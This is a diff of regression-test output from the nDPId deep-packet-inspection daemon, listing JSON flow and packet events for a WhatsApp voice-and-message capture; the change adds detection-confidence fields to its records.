 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432820570876,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820570876,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1432820571176,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFAABIABpAABAR5EUfDV0wCggAAQ2W0XQANAkRAQMAGCESpEIAABBswYmYde0br2MAIAAIAAGc8p6wzx5AAgAIAAABTZrC3MQ="}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820571176,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432820571488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820571488,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFAABIABxAABAR+EMfDUkwCggAAQ2W0XQANGvUAQMAGCESpEIAAOlKSWdSWOu7U1cAIAAIAAGOsJ6wzx5AAgAIAAABTZrC3xA="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432820571716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":64,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820558921,"flow_last_seen":1432820571925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1690,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1432820571925,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820558921,"flow_last_seen":1432820571925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1690,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1432820571925,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"}
-00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":152,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820633802,"flow_last_seen":1432820634797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":1521,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1432820634797,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432820633802,"flow_last_seen":1432820634797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":1521,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1432820634797,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":179,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432820681624,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
